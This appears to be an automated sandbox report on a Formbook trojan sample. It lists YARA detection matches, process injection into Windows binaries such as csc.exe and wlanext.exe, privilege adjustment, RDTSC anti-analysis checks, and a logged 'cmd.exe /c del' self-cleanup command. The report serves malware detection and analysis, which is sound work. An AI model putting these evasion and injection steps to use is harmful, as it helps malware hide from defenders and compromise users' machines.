          Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4578868311.000000000E24E000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Iifpj4i2kC.exe PID: 6924, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 6880, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: csc.exe PID: 4340, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
          Source: Process Memory Space: wlanext.exe PID: 6432, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Iifpj4i2kC.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9952111881684492
          Source: classification engineClassification label: mal100.troj.evad.winEXE@13/0@13/2
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA51830 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,0_2_00007FF67FA51830
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00FD3355 memset,GetCurrentProcess,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,7_2_00FD3355
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1468:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_03
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Iifpj4i2kC.exeReversingLabs: Detection: 55%
          Source: Iifpj4i2kC.exeVirustotal: Detection: 70%
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeFile read: C:\Users\user\Desktop\Iifpj4i2kC.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Iifpj4i2kC.exe "C:\Users\user\Desktop\Iifpj4i2kC.exe"
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeSection loaded: icu.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
          Source: Iifpj4i2kC.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: Iifpj4i2kC.exeStatic file information: File size 1627744 > 1048576
          Source: Iifpj4i2kC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: Iifpj4i2kC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: Iifpj4i2kC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: Iifpj4i2kC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Iifpj4i2kC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: Iifpj4i2kC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Iifpj4i2kC.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Iifpj4i2kC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: csc.exe, 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2123426388.0000000005009000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2130282341.00000000053DB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000003.2193080351.0000000003553000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.0000000003700000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000007.00000003.2191313736.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.000000000389E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2123426388.0000000005009000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2130282341.00000000053DB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000007.00000003.2193080351.0000000003553000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.0000000003700000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000007.00000003.2191313736.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.000000000389E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: csc.exe, 00000005.00000002.2191462232.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000005.00000002.2191684183.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000007.00000002.4561621241.0000000000FD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: explorer.exe, 00000006.00000002.4579757546.000000000FFFF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562082880.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4563248125.0000000003CEF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: csc.pdb source: explorer.exe, 00000006.00000002.4579757546.000000000FFFF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562082880.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4563248125.0000000003CEF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: csc.exe, 00000005.00000002.2191462232.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000005.00000002.2191684183.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4561621241.0000000000FD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: csc.pdbF source: explorer.exe, 00000006.00000002.4579757546.000000000FFFF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562082880.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4563248125.0000000003CEF000.00000004.10000000.00040000.00000000.sdmp
          Source: Iifpj4i2kC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Iifpj4i2kC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Iifpj4i2kC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Iifpj4i2kC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Iifpj4i2kC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
          Source: Iifpj4i2kC.exeStatic PE information: section name: .managed
          Source: Iifpj4i2kC.exeStatic PE information: section name: hydrated
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_00417968 pushfd ; retf 5_2_0041796A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_004191A3 push di; retf 5_2_004191A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_00416479 push ebp; ret 5_2_00416450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041640A push ebp; ret 5_2_00416450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041D4B5 push eax; ret 5_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041D56C push eax; ret 5_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041D502 push eax; ret 5_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041D50B push eax; ret 5_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_00417D1E push esp; ret 5_2_00417D32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_00417D3C push esp; ret 5_2_00417D32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_00417655 push esi; iretd 5_2_00417656
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041760D push esi; retf 5_2_0041761D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C09AD push ecx; mov dword ptr [esp], ecx5_2_055C09B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0510E9B5 push esp; retn 0000h5_2_0510EAE7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0510EB1E push esp; retn 0000h5_2_0510EB1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0510EB02 push esp; retn 0000h5_2_0510EB03
          Source: C:\Windows\explorer.exeCode function: 6_2_0E10CB1E push esp; retn 0000h6_2_0E10CB1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0E10CB02 push esp; retn 0000h6_2_0E10CB03
          Source: C:\Windows\explorer.exeCode function: 6_2_0E10C9B5 push esp; retn 0000h6_2_0E10CAE7
          Source: C:\Windows\explorer.exeCode function: 6_2_0E239B02 push esp; retn 0000h6_2_0E239B03
          Source: C:\Windows\explorer.exeCode function: 6_2_0E239B1E push esp; retn 0000h6_2_0E239B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2399B5 push esp; retn 0000h6_2_0E239AE7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00FE003D push ecx; ret 7_2_00FE0050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037309AD push ecx; mov dword ptr [esp], ecx7_2_037309B6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EE91A3 push di; retf 7_2_00EE91A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EED4B5 push eax; ret 7_2_00EED508
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EE6479 push ebp; ret 7_2_00EE6450
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EE640A push ebp; ret 7_2_00EE6450
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EED56C push eax; ret 7_2_00EED572
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EED50B push eax; ret 7_2_00EED572
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EED502 push eax; ret 7_2_00EED508
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: ED9904 second address: ED990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: ED9B7E second address: ED9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory allocated: 28DE51A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2891Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7046Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 862Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 2340Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 7633Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-29745
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI coverage: 2.2 %
          Source: C:\Windows\SysWOW64\wlanext.exeAPI coverage: 2.0 %
          Source: C:\Windows\explorer.exe TID: 4196Thread sleep count: 2891 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 4196Thread sleep time: -5782000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4196Thread sleep count: 7046 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 4196Thread sleep time: -14092000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5552Thread sleep count: 2340 > 30Jump to behavior
